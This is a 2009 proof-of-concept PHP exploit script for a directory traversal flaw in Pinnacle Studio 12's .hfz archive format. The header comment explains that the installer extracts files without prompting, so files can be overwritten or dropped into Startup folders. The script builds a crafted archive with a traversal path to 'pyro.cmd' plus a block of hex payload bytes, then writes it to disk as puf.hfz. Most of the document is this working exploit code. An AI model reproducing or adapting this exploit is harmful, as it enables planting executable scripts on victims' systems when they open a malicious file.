pinnaclestudio-traversal.txt
Posted on 14 May 2009
<?php /* Pinnacle Studio 12 "Hollywood FX Compressed Archive" (.hfz) directory traversal vulnerability poc by Nine:Situations:Group::pyrokinesis Our site: http://retrogod.altervista.org/ Software site: http://www.pinnaclesys.com/ Some keys exported from the registry: [HKEY_CLASSES_ROOT.hfz] @="hfzfile" [HKEY_CLASSES_ROOT.hfzhfzfile] [HKEY_CLASSES_ROOT.hfzhfzfileShellNew] [HKEY_CLASSES_ROOThfzfile] @="Hollywood FX Compressed Archive" [HKEY_CLASSES_ROOThfzfileDefaultIcon] @="C:\WINDOWS\Installer\{D041EB9E-890A-4098-8F94-51DA194AC72A}\_A7BEE02B_CF3C_4710_85A0_92A3876E6F9C,0" [HKEY_CLASSES_ROOThfzfileshell] [HKEY_CLASSES_ROOThfzfileshellOpen] [HKEY_CLASSES_ROOThfzfileshellOpencommand] @=""C:\Documents and Settings\All Users.WINDOWS\Documenti\Pinnacle\Content\HollywoodFX\InstallHFZ.exe" "%1"" "command"=hex(7):70,00,7e,00,46,00,78,00,6b,00,3f,00,49,00,63,00,69,00,38,00,\n79,00,2b,00,37,00,32,00,6f,00,21,00,31,00,61,00,68,00,31,00,48,00,46,00,58,\n00,3e,00,49,00,4d,00,53,00,27,00,73,00,50,00,7a,00,2e,00,6a,00,3d,00,34,00,\n70,00,41,00,5b,00,4e,00,72,00,64,00,29,00,70,00,76,00,20,00,22,00,25,00,31,\n00,22,00,00,00,00,00 Usually files are decompressed in a Pinnacle effects folder... Problem is ... that .hfz files can be used to overwrite files on the target system or placing scripts in Startup folders by directory traversal attacks and InstallHFX.exe decompresses them with no prompts! Just modified an existing .hfz file and here it is the dump ... Also I experienced some crashes in doing this... investigating... */ $____path = "..\..\..\..\..\..\..\..\pyro.cmd"; $____payload = "x48x46x58x5ax48x46x58x5ax9cx07x00x00x49x00x00x00". "x00x21x00x00x00x7e". $____path. "x65x07x00x00xa8x1cx00x00x8dxc2x71x5a". "x78x9cxbdx59x7bx4cx53x57x1cxbex05xf6x10x96x6cx0b". "x33xabx2fx5ax2dxe0xe4xddxd6x84xf2x18xbdx2dx6fx04". "x8axa5x50x44x50xcbx1bx05x8ax3cxb4x22x8ex25x26xcb". "xd4x64xeex8fx2dx9bxcbxe6xd4x2cx21xd3x65x6ex59xa2". "x5bx8cx01x97xa8x89xc1x05xf7xd7xd8x12xcdxc8x12x51". "xf7x62xe0x03x5fx77xdfxedx69x2fxb7xb7xb7xb7xe5xb2". "xecxe4x77x2exe7x9ex7bxcexefx7cxf7xfbx3dxcexb9xa5". "xa8xa0x26xbfx28x3fx4fx97x42x51x54x24xaaxd9x54x99". "x5cxd1xdexadx4exd3xe3x86x3axd4xd1x9ax13x45x7ax93". "x2ax4ax51xadx16xb6x5bx41x29x5cx54x71x59xa1x76xf0". "x15x8ax0ax53x84x47xa4xa1x33x16xd5xfbx37x70x79xd3". "xc8xafx76x3bx13x54xaaxabx9fx86x32xecx3fx97x50xd6". "x4dx4cx1cx0ax2ax09x09x6fx48x0fx08x65xa1xaaxaax27". "x16xcbx7dxc8x22xf1x00x4cx7axfax90x46xb3x3bx14xe4". "x44x44x17x6ax69x61x76xeex64x6cxb6xc7x10x09x3cx4c". "x5cx9cx3cx79x1ax1bxcbxbfx95xc6xd3xddxcdx6cxdexcc". "x6cxdcx38x07x7ex9cx4exc6x6ax7dx88x76x40x3cxa9xa9". "xf7x56xaex0cx02x20x21xe1xa1x5ax2dx31x60xe2xccx19". "xbexf8x2fx04x0cxe0x07xd7xcaxcax47x5bxb7x32xa5xa5". "xb3x25x25xffx04xe4x67xfdxfax07x31x31x8fxd7xacx09". "xb4x1cxc0xb0x78xd2xd3xefxafx5ax25x0fx0fx64x60x80". "xb5x17x50xa1x8dx6bx4dx0dx53x5bx1bx00x0fx4dx33x26". "x93xc0x04x44xe6x62x63x87x95x4axc8x1dx70xa8xd5x4a". "xf0x33x7bxedxdax0fxa7x4ex49xe0x81xdbx13x4ex60x3e". "xc2x18xb1x1axdfxc9xe7x75xc6xc7xcfxa9x54xb3xcbx97". "x0bx50x4dxb9xcbx65x9bx6bx9axb0x97x98xc8xacx5dx8b". "xc6xa3xd5xabxfdxf9xf9xf1xf4x69x09x3cx44x0ax0bxff". "x22x60x7ax7ax3cx44x01xe7x86x0dx33xe4x29x56xf7x01". "x60x36xb3x0bxe9xf5x5cxe7x6dx77x99xd8xbax7fx9axb3". "xa6xc1xc0x5ex4dx26x51x7bx4dx5dxbcx28x8dx07x02x4b". "x11x5ax9ax9bx59x3cxadxadxecx6dx47x87x78x7cxb1x48". "x52x53xe1xc0x84x01x82xe7x6axcdxc0xb4xc0xbbx32x32". "xf8x2fx12x8axffx08xa4xa8xe8x6fxe0x81xc9xcaxcbxef". "x21x1bx80xb1x80xf1x1ex1fxefx01x96x99x49xf0x7cx91". "xd7x26xc4xc3x49x72x32xaex93x23x23x0bxc5x43x04x90". "x20x68xecxd8xc1x72x25x11xc2x0fxd6xacx99xd1x68x08". "x9exc3x7ax3bxf0xf8x3bx3cxd7xf3xf3xd9xb3x80x71x65". "x78x78xa1x78x88xa5x90x04x48xdcx91xe0x12x8dxe2xdf". "xbax3ex44x58x11x3cxfbxd3x6cx1cx3fxa2x61x48x60x5c". "x3fx77x4ex06x1ex22x34x3dx55x5fxcfx20xa0xe0xc3xac". "xcexecx6cxc1x8bx03x46xd2xd2xd5x04xcfx50x8ax15x78". "x66x96x2dx93x88x77x79xf6xe2x0bxd2x91x27xc9xa8x54". "x82x64x48xf0x70x65xdfx6bx65x7fxa8x54x4fx34x1ax8c". "x14xc5x83x80xadxabx63x75xbax5cx9exd4x27x0fx12x5f". "xe7xddx15x2bx18xa3x91x6fx3bx0excfx50x42xb9xc7x5e". "x08xf3x82x02x7fx3cx44x1bx49x74x48xc2xc8x2dxd8xd0". "x17x89x87x64x39x6cx1cx10x01xa4xb7x12xcax89xdbx60". "x00x1axe4xeax8fx67xefx5exa6xa2xe2xc1xf6xedx32xc9". "x09x18xefx49x49xdcxeex79x43xadxbex2cxd8x6dxe3xe3". "x81x07xb6xf3xc7x63x77x6fx0ax70x4bxd1xb5xf2xf2x7e". "x97x89x87x64xe0x94x14xa9x7dxdfx68x84xcbx71xc0x82". "x2exb4x6bx17x0bx15x3bxbbx1cx3cx71x71xacx17x91xb8". "x93x90xacx2cxcexb2xd2xabx20xbdx60x77x40x86x41x1e". "x16x3dxf9x70x27xccx20x2bx86x2cx12x60xb0x5bxc1xc3". "xe1xeax84x1cx04x20x12x20x4ex65x12x53x2cx96x5bx34". "x7dx2ex3bxfbxebxf0xf0xe7x15x0axc5xf8xf8x38x17x59". "x4axa5xb2x25xc1x66x30x0cxe7xe5x9dxedxefx9fx95xed". "xa8x90xe2xe2x69x72x50x04x1bx88 $_f = fopen("puf.hfz", "w+"); fputs($_f, $____payload); fclose($_f); ?>
